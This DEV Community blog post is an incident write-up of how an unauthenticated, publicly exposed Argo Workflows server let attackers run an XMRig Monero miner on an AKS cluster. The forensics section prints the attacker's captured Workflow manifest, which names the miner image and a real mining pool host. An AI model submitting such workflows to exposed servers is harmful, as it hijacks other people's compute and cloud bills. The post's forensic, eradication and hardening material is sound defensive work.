DEV Community

Cover image for How an Exposed Argo Server Turned Our AKS Cluster Into a Crypto Miner
Muruganantham Palanisamy
Muruganantham Palanisamy

Posted on

How an Exposed Argo Server Turned Our AKS Cluster Into a Crypto Miner

Note: All identifiers in this post — cluster names, subscriptions, IPs, wallet addresses, and emails — have been anonymized. The technical details, timeline, and remediation steps are taken from a real incident I responded to.

A development AKS cluster that nobody was watching closely spent roughly three days mining Monero for a stranger. No data was stolen. Nothing crashed. The only reason we caught it was a routine agentless scan flagging a container image as malware. This is the full story: how the attacker got in, what the forensics showed, and the exact changes that closed the hole.

If you run Kubernetes — especially "just a POC" clusters — this is the cheapest security lesson you'll ever get.


TL;DR

  • A POC AKS cluster was running Argo Workflows with an argo-server exposed to the public internet on port 80 with --auth-mode=server — meaning no authentication required.
  • An attacker scanned for it, found it, and submitted Argo Workflow objects running miningcontainers/xmrig:latest, pointed at a Monero mining pool.
  • With no NetworkPolicy, no Pod Security Admission, and a cluster-admin ClusterRoleBinding lying around, nothing stopped it.
  • It mined for ~3 days on 8 vCPUs before an agentless malware scan caught the image.
  • Fix = kill the entry point, then layer on AuthN, NetworkPolicy, Pod Security Standards, admission control on registries, and runtime monitoring.

The detection

The first signal came from an agentless container scanner (Prisma Cloud in our case, but Defender for Containers or Trivy-operator would catch the same thing). Two minutes after a container instance restarted, the scanner reported:

Rule Severity Finding
Malware (WildFire) Critical Image flagged as malware — 4 instances
Crypto-mining binaries High Image contains known mining binaries
Runs as root High Image created without a non-root user

The image was the giveaway:

docker.io/miningcontainers/xmrig:latest
Enter fullscreen mode Exit fullscreen mode

xmrig is the most popular open-source Monero (XMR) CPU miner. When it shows up in your cluster and you didn't put it there, you've been cryptojacked.


The forensics

We stopped the cluster first (containment), then restarted it in a controlled window to collect evidence before cleaning up. Here's what we found.

1. The entry point: an unauthenticated Argo server

The cluster had been set up months earlier for an Argo CI/CD + Workflows POC. Over time, several argo-server variants had accumulated — and one of them was wide open:

kubectl get svc -n argo
Enter fullscreen mode Exit fullscreen mode
NAME                  TYPE           EXTERNAL-IP        PORT(S)        AUTH
argo-server-noauth    LoadBalancer   <public-ip>        80             --auth-mode=server  <-- NO AUTH
argo-server-open      LoadBalancer   <public-ip>        80             --auth-mode=client
argo-server-public    LoadBalancer   <public-ip>        80,443         unknown
argo-server-nodeport  NodePort       -                  30746          unknown
argo-server           LoadBalancer   <public-ip>        2746           default
Enter fullscreen mode Exit fullscreen mode

That first one is the problem. In Argo Workflows, --auth-mode=server means the server authenticates as itself to the cluster and does not require the caller to present any credentials. Expose that behind a public LoadBalancer on port 80 and you've effectively published a "run any container you want on my cluster" API to the entire internet.

Automated scanners (Shodan, Censys, mass-scanners) find these within hours.

2. The payload: a captured malicious workflow

The attacker submitted ordinary-looking Argo Workflow objects. Here's a sanitized copy of what was actually on the cluster:

apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: besteffort-probe-
  namespace: argo
  labels:
    workflows.argoproj.io/creator: system-serviceaccount-argo-argo-server
spec:
  entrypoint: run
  templates:
  - name: run
    container:
      image: miningcontainers/xmrig:latest
      args:
      - "-k"
      - "-o"
      - "auto.c3pool.org:443"     # Monero mining pool
      - "-u"
      - "<attacker-monero-wallet>" # payout address
      - "-p"
      - "AR"                       # worker label
Enter fullscreen mode Exit fullscreen mode

Note the innocuous generateName: besteffort-probe- — it's trying to look like noise. Three of these were submitted and ran as besteffort-probe-xxxxx pods.

3. Why nothing stopped it

This is the part worth internalizing. The miner ran because every layer that should have blocked it was missing:

Control that was missing What it would have prevented
AuthN on Argo server Anonymous workflow submission
NetworkPolicy (networkPolicy: none) Egress to the mining pool
Pod Security Admission Root/privileged containers
Registry admission control Pulling docker.io/miningcontainers/*
Runtime monitoring (Container Insights off) Alerting on sustained 100% CPU
Least-privilege RBAC A stray cluster-admin ClusterRoleBinding (argo-admin) gave workflows the keys to the kingdom

Security is layered for exactly this reason. Any one of these controls would have stopped or flagged the attack. Zero of them were present.

4. The blast radius

XMRig is "just" a miner, so there was no data exfiltration. But the same unauthenticated path could have been used to:

  • Read every Secret the Argo service account could reach
  • Move laterally (no NetworkPolicy = flat network)
  • Steal CI/CD credentials mounted into workflows

Treat cryptojacking as a signal, not the whole problem. If they could run a miner, they could run anything.


The timeline

~months prior   POC cluster created; multiple argo-server deployments pile up;
                argo-server-noauth exposed publicly on :80 with no auth

Day 0 13:14     Attacker submits 3 "besteffort-probe" workflows via the open Argo API
                -> image: miningcontainers/xmrig:latest -> pool: auto.c3pool.org:443

Day 0 -> Day 3  XMRig mines Monero on 2x Standard_D4s_v3 (8 vCPUs) ~24/7

Day 3 04:19     Container instance restarts; agentless scan picks it up
Day 3 04:21     Scanner confirms malware (WildFire + mining binaries)

Day 3-4         Security notified -> cluster STOPPED (containment)
Day 4           Controlled restart for forensics -> eradication -> hardening
Enter fullscreen mode Exit fullscreen mode

Three days of free compute on someone else's Azure bill. On a bigger or GPU-enabled cluster, that's a very expensive weekend.


Eradication

Containment first (az aks stop), then — once restarted in a controlled window — hunt and destroy:

# Hunt for the miner across all namespaces
kubectl get pods -A -o wide | grep -iE 'xmrig|mining|besteffort'
kubectl get workflows -A
kubectl get cronworkflows -A

# Delete malicious workloads and workflows
kubectl delete workflow <name> -n argo
kubectl delete pod <name> -n argo --force --grace-period=0

# Remove the entry points
kubectl delete svc argo-server-noauth argo-server-open argo-server-public -n argo
kubectl delete deploy argo-server-noauth argo-server-open -n argo

# Kill persistence: look for stray cluster-admin bindings
kubectl get clusterrolebindings | grep -v '^system:'
kubectl delete clusterrolebinding argo-admin-binding

# Purge cached malicious images from nodes
az aks update -n <cluster> -g <rg> \
  --enable-image-cleaner --image-cleaner-interval-hours 24
Enter fullscreen mode Exit fullscreen mode

Then rotate everything the attacker could have touched: Kubernetes Secrets, registry credentials, any Git/CI tokens mounted into workflows.


Hardening — the part that actually matters

Removing the miner is easy. Making sure it can't happen again is the job. Here's what we applied, in order of impact.

1. Never expose a workflow engine without auth

If Argo needs to be reachable, put it behind SSO and drop --auth-mode=server for public endpoints. Better: don't give it a public LoadBalancer at all — use private ingress + VPN/Entra ID.

2. NetworkPolicy: deny egress by default

The single highest-ROI control. A miner that can't reach a pool is useless.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all
  namespace: argo
spec:
  podSelector: {}
  policyTypes: [Ingress, Egress]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-only
  namespace: argo
spec:
  podSelector: {}
  policyTypes: [Egress]
  egress:
  - ports:
    - { protocol: UDP, port: 53 }
    - { protocol: TCP, port: 53 }
Enter fullscreen mode Exit fullscreen mode

Enable the engine at the cluster level too:

az aks update -n <cluster> -g <rg> --network-policy calico
Enter fullscreen mode Exit fullscreen mode

3. Pod Security Admission: ban root/privileged

apiVersion: v1
kind: Namespace
metadata:
  name: argo
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
Enter fullscreen mode Exit fullscreen mode

The XMRig image runs as root — restricted would have rejected it outright.

4. Admission control on registries (Gatekeeper / Azure Policy)

Only allow images from registries you trust. docker.io/miningcontainers/* should never be pullable.

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAllowedRepos
metadata:
  name: allowed-repos
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
  parameters:
    repos:
    - "myregistry.azurecr.io/"
Enter fullscreen mode Exit fullscreen mode

5. Turn monitoring ON

The cluster had Container Insights disabled, so nobody saw 8 vCPUs pinned at 100% for three days. Enable it and alert on sustained CPU + unexpected egress.

az aks enable-addons -n <cluster> -g <rg> --addons monitoring
az aks update -n <cluster> -g <rg> --enable-defender
Enter fullscreen mode Exit fullscreen mode

6. Least privilege + identity

az aks update -n <cluster> -g <rg> \
  --enable-oidc-issuer --enable-workload-identity --disable-local-accounts
Enter fullscreen mode Exit fullscreen mode

Delete stray cluster-admin bindings. Workflows should run with the minimum RBAC they need, never cluster-admin.


Takeaways

  1. "It's just a POC" is how most breaches start. Dev clusters get the least attention and the loosest config. Attackers don't care about your environment label.
  2. A public endpoint + no auth = a public API to your compute. Argo, Jupyter, Ray dashboards, Kubeflow, the Kubernetes dashboard — all have been abused this exact way.
  3. Layered controls win. Any one of NetworkPolicy, PSA, registry admission, or monitoring would have stopped or surfaced this. Don't rely on a single gate.
  4. Cryptojacking is a smoke alarm. If someone can run a miner, assume they could have run anything — rotate credentials and hunt for persistence.
  5. You can't respond to what you can't see. Monitoring isn't optional, even in dev.

If you run Argo (or any workflow engine) on Kubernetes, go check right now:

kubectl get svc -A | grep -iE 'argo|dashboard|jupyter|ray|kubeflow'
Enter fullscreen mode Exit fullscreen mode

Anything with a public EXTERNAL-IP and no auth in front of it is your next incident.

Top comments (0)